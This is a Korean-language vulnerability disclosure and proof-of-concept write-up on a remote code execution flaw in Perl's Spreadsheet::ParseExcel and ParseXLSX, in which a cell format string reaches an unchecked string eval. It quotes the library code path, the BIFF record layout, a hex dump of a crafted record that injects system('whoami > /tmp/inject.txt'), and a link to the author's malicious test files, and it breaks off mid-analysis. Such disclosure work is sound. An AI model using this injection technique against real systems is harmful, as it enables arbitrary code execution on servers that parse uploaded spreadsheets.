
ParseExcel 라이브러리와 의존 라이브러리인 ParseXLSX의 RCE 취약점에 대한 PoC
TL;DR: 형식 문자열 파싱 로직에서 발생하는 RCE.
익스플로잇의 근본 원인은 Utility.pm에서 검증되지 않은 사용자 입력에 대해 eval을 호출하는 데서 비롯됩니다.
# Uitlity.pm
sub ExcelFmt {
my ( $format_str, $number, $is_1904, $number_type, $want_subformats ) = @_;
return $number unless $number =~ $qrNUMBER;
my $conditional;
if ( $format_str =~ /^\[([<>=][^\]]+)\](.*)$/ ) {
$conditional = $1;
$format_str = $2;
}
#...
if ($conditional) {
# TODO. Replace string eval with a function.
$section = eval "$number $conditional" ? 0 : 1;
}
#...
}
제가 조사한 바에 따르면, 이 흐름의 현재 구현은 적절한 검증이 부족하며, 비교 로직을 처리하는 데 eval을 사용하는 것은 이 경우 지나치게 과한 방식입니다. 이 때문에 Excel 파일에서 데이터를 읽는 데 사용되는 ParseExcel::parse와 ParseXLSX::parse가 모두 RCE에 취약합니다.
$format_str은 어디에서 오는가?ValFmt이 ExcelFmt을 호출할 가능성이 가장 높으므로 이 메서드에 대해 더 자세히 설명하겠습니다.
sub ValFmt {
my ( $oThis, $oCell, $oBook ) = @_;
my ( $Dt, $iFmtIdx, $iNumeric, $Flg1904 );
if ( $oCell->{Type} eq 'Text' ) {
$Dt =
( ( defined $oCell->{Val} ) && ( $oCell->{Val} ne '' ) )
? $oThis->TextFmt( $oCell->{Val}, $oCell->{Code} ) # Perform some encoding logic => doesn't cause RCE
: '';
return $Dt;
}
else {
$Dt = $oCell->{Val};
$Flg1904 = $oBook->{Flg1904};
my $sFmtStr = $oThis->FmtString( $oCell, $oBook );
# where RCE lies => $oCell->{Type} must be either "Date" or "Number"
return ExcelFmt( $sFmtStr, $Dt, $Flg1904, $oCell->{Type} );
}
}
$oCell->{Type}이 Date 또는 Number이면 ExcelFmt이 호출됩니다.
$format_str 값은 다른 메서드인 FmtString에서 반환됩니다.
sub FmtString {
my ( $oThis, $oCell, $oBook ) = @_;
my $sFmtStr =
$oThis->FmtStringDef( $oBook->{Format}[ $oCell->{FormatNo} ]->{FmtIdx},
$oBook ); # maps to the correct format string
#...
unless ( defined($sFmtStr) ) {
# assigns default format string depending on the value, can ignore
#...
}
return $sFmtStr;
}
또 다른 함수가 호출되므로 FmtStringDef도 살펴보겠습니다.
sub FmtStringDef {
my ( $oThis, $iFmtIdx, $oBook, $rhFmt ) = @_;
my $sFmtStr = $oBook->{FormatStr}->{$iFmtIdx}; # does the mapping
# More with assigning default format string, can ignore
#...
}
모든 변수가 명확하므로 공격 벡터는 다음과 같이 정리할 수 있습니다:
$iFmtIdx로 악성 형식 문자열을 주입합니다.$oBook->{Format}[$cellFmtIdx]이 $iFmtIdx를 가리키도록 만듭니다.$oCell->{FormatNo} = $cellFmtIdx).
![[flow 1.png]]아래 섹션에서는 페이로드가 셸 코드를 eval 명령까지 전파하는 방법에 대해 자세히 설명하겠습니다. ParseExcel을 사용한 .xls 파일 파싱과 ParseXLSX를 사용한 .xlsx 파일 파싱에 대한 2개의 섹션이 있습니다.
시연을 위해, whoami를 실행하고 결과를 /tmp/inject.txt 파일에 저장하는 직접 제작한 악성 Excel 파일(.xls 및 .xlsx)의 링크는 아래와 같습니다.
https://gist.github.com/haile01/0f4f19e4441895ef33ff27385080478b
아래와 같이 ParseExcel::parse를 사용하는 간단한 Perl 프로그램을 예로 들어보겠습니다. 데이터를 가져오기 전에 파싱이 수행되는 동안 RCE가 발생합니다.
use strict;
use Spreadsheet::ParseExcel;
my $parser = Spreadsheet::ParseExcel->new();
# file.xls is malicious file from end user
my $workbook = $parser->parse("test.xls");
Excel 97 바이너리 파일은 BIFF 레코드라는 바이너리 데이터 청크로 구성됩니다. 각 레코드는 opCode(리틀엔디언)라는 헤더로 시작하며, 그다음 레코드 길이와 실제 데이터가 이어집니다.
sub QueryNext {
my ( $q ) = @_;
if ( $q->{streamPos} + 4 >= $q->{streamLen} ) {
return 0;
}
my $data = substr( $q->{stream}, $q->{streamPos}, 4 );
( $q->{opcode}, $q->{length} ) = unpack( 'v2', $data );
# No biff record should be larger than around 20,000.
if ( $q->{length} >= 20000 ) {
return 0;
}
if ( $q->{length} > 0 ) {
$q->{data} = substr( $q->{stream}, $q->{streamPos} + 4, $q->{length} );
}
else {
$q->{data} = undef;
$q->{dont_decrypt_next_record} = 1;
}
if ( $q->{encryption} == MS_BIFF_CRYPTO_RC4 ) {
# Handles with decryption
}
elsif ( $q->{encryption} == MS_BIFF_CRYPTO_XOR ) {
# not implemented
return 0;
}
elsif ( $q->{encryption} == MS_BIFF_CRYPTO_NONE ) {
}
$q->{streamPos} += 4 + $q->{length};
return 1;
}
그 후, 레코드 유형에 해당하는 핸들러가 해당 BIFF 레코드 데이터를 추출하는 데 사용됩니다.
if ( defined $self->{FuncTbl}->{$record} && !$workbook->{_skip_chart} )
{
$self->{FuncTbl}->{$record}
->( $workbook, $record, $record_length, $record_header );
}
형식 문자열은 opCode = 0x41E인 _subFormat에 의해 처리됩니다.
sub _subFormat {
my ( $oBook, $bOp, $bLen, $sWk ) = @_;
my $sFmt;
if ( $oBook->{BIFFVersion} <= verBIFF5 ) {
$sFmt = substr( $sWk, 3, unpack( 'c', substr( $sWk, 2, 1 ) ) );
$sFmt = $oBook->{FmtClass}->TextFmt( $sFmt, '_native_' );
}
else {
$sFmt = _convBIFF8String( $oBook, substr( $sWk, 2 ) );
}
my $format_index = unpack( 'v', substr( $sWk, 0, 2 ) );
# Excel 4 and earlier used an index of 0 to indicate that a built-in format
# that was stored implicitly.
if ( $oBook->{BIFFVersion} <= verBIFF4 && $format_index == 0 ) {
$format_index = keys %{ $oBook->{FormatStr} };
}
$oBook->{FormatStr}->{$format_index} = $sFmt;
}
제 .xls 파일에서 어떤 BIFF 버전이 사용되는지 확실하지 않았지만 바이너리 파일의 데이터에 따르면 else 분기(> verBIFF5)와 일치해야 합니다.
최신 BIFF 버전의 형식 문자열 레코드 구조는 다음과 같아야 합니다: 1E 04 [레코드 길이 - 2바이트] [형식 문자열 인덱스 - 2바이트] [형식 문자열 길이 - 1바이트] [문자열 플래그 - 2바이트] [형식 문자열 내용]
올바른 구조를 따르면 .xls 파일에 임의의 형식 문자열을 주입할 수 있습니다.
PoC에서 주입한 형식 문자열의 실제 BIFF 레코드(형식 문자열 인덱스는 \x00\xa5)입니다.
00000000: 1e04 3100 a500 2c00 005b 3e31 3233 3b73 ..1...,..[>123;s
^^^^
format string index
00000010: 7973 7465 6d28 2777 686f 616d 6920 3e20 ystem('whoami >
00000020: 2f74 6d70 2f69 6e6a 6563 742e 7478 7427 /tmp/inject.txt'
00000030: 295d 3132 33 )]123
셀 형식은 형식 문자열, 스타일, 글꼴 등 셀의 많은 속성을 정의합니다. 하나의 셀 형식은 BIFF 레코드에 형식 문자열의 인덱스를 포함하여 하나의 형식 문자열에 연결할 수 있습니다. 이 로직은 _subXf에 의해 처리됩니다.
sub _subXF {
my ( $oBook, $bOp, $bLen, $sWk ) = @_;
#...
if ( $oBook->{BIFFVersion} == verBIFF4 ) {
#...
}
elsif ( $oBook->{BIFFVersion} == verBIFF8 ) {
my ( $iGen, $iAlign, $iGen2, $iBdr1, $iBdr2, $iBdr3, $iPtn );
( $iFnt, $iIdx, $iGen, $iAlign, $iGen2, $iBdr1, $iBdr2, $iBdr3, $iPtn )
= unpack( "v7Vv", $sWk );
#...
}
else {
( $iFnt, $iIdx, $iGen, $iAlign, $iPtn, $iPtn2, $iBdr1, $iBdr2 ) =
unpack( "v8", $sWk );
#...
}